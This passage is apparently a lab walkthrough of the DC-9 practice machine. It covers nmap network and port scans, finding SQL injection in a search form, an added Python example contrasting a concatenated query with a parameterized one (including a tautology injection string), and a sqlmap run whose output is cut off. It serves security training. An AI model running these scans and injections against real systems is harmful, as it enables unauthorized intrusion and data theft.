2-1. DC-9
Scan for the target machine's IP address with nmap
nmap -sP 192.168.49.1/24
Found the DC-9 IP address: 192.168.49.105
Port scan of 192.168.49.105
nmap -p 1-65535 192.168.49.105
Ports 22 and 80 were found, but port 22 is in the filtered state
web
Visit port 80
The 'Search' page accepts user input
Testing shows that the Search function is vulnerable to SQL injection
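Why a search box like this ends up injectable, and what the fix looks like, as an added example that is not code from the target application or from the original notes. SQLite stands in for the target's database, and the table, column and function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data; the schema is an assumption, not the target's.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE staff (firstname TEXT, lastname TEXT)")
    db.executemany("INSERT INTO staff VALUES (?, ?)", [
        ("Alice", "Adams"),
        ("Bob", "Brown"),
        ("Carol", "Clark"),
    ])
    return db

def search_vulnerable(db, term):
    # The search term is pasted into the SQL text, so a quote character in
    # `term` changes the structure of the query instead of its data.
    sql = "SELECT firstname, lastname FROM staff WHERE firstname = '" + term + "'"
    return db.execute(sql).fetchall()

def search_parameterized(db, term):
    # The placeholder binds `term` as a value; it is never parsed as SQL.
    sql = "SELECT firstname, lastname FROM staff WHERE firstname = ?"
    return db.execute(sql, (term,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for term in ("Alice", "Alice' OR '1'='1", "Alice'"):
        try:
            weak = search_vulnerable(db, term)
        except sqlite3.OperationalError as exc:
            # A lone quote breaks the concatenated statement: the error (or a
            # changed page) is what a tester notices on the search form.
            weak = "SQL error: %s" % exc
        print("%-20r vulnerable=%s parameterized=%s"
              % (term, weak, search_parameterized(db, term)))
```

With the bound parameter the quote-bearing inputs are just names that match nothing, which is the behaviour the search form should have had.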
Capture the request, save it to a txt file, then run sqlmap
# sqlmap -r 1.txt --dbs
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.5#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:44:24 /2021-06-17/
[23:44:24] [INFO] parsing HTTP request from '1.txt'
[23:44:24] [INFO] testing connection to the target URL
[23:44:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:44:24] [INFO] testing if the target URL content is stable
[23:44:25] [INFO] target URL content is stable
[23:44:25] [INFO] testing if POST parameter 'search' is dynamic
[23:44:25] [WARNING] POST parameter 'se